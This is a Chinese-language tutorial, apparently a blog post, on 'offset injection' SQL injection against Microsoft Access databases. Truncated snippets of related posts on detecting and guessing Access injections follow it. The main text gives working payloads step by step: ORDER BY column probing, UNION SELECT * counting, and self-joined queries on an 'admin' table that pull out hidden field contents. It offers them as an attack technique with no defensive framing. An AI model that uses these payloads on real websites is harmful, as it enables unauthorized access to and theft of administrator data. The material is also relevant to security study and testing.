偏移注入主要是針對知道表,但是不知道欄位的access資料庫。
比如我們已經知道了表名是 admin
判斷字段數:
order by 22 返回正常
order by 23 返回錯誤
欄位數為 22
判斷表內存在的字段數:
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 返回同上圖一樣得顯示位頁面
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin 返回錯誤
說明了admin表下有16個字段。
order by 出的字段數減去 * 號判斷出的字段數,然而再用order by的字段數減去2倍剛才得出來的答案
1. 22-16 = 6
2. 22-(6*2) = 10
所以答案就是 10
一級偏移注入公式:
union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
此時可以增加a.id或者b.id或者a.id和b.id一起加上去來改變隨機爆破出來的內容比如:
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
此時可以增加a.id或者b.id或者a.id和b.id一起加上去來改變隨機爆破出來的內容比如:
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:檢視源**有奇效,可能會出現驚喜
SQL注入之偏移注入(Access)
什麼是偏移注入?偏移注入是一種注入姿勢,可以根據乙個較多字段的表對乙個少字段的表進行偏移注入,一般是聯合查詢,在頁面有回顯點的情況下 偏移注入使用場景 在 sql注入的時候會遇到一些無法查詢列名的問題,比如系統自帶資料庫的許可權不夠而無法訪問系統自帶庫。當你猜到表名無法猜到欄位名的情況下,我們可以使...
Access資料庫注入方法
檢測注入型別 1.數字型 and 1 1 返回正常頁面 and 1 2 返回錯誤頁面或者和1 1返回的頁面不同 2.字元型 and 1 1 and 返回正常頁面 and 1 2 and 返回錯誤頁面或者和1 1返回的頁面不同 3.搜尋型 and 1 1 and 返回正常頁面 and 1 2 and ...
ACCESS資料庫的注入
access資料庫的注入access資料庫的注入與mssql不同,要得到表名,字段,以及欄位的內容不能用mssql 暴 的方法直接得 到,access只能用猜解出表名和字段,然後再猜解出字段的長度,最後把字段的內容從第一位到第n位乙個個猜 解出來,採用的猜解方法類似玩乙個遊戲猜大小,比如乙個數字,猜...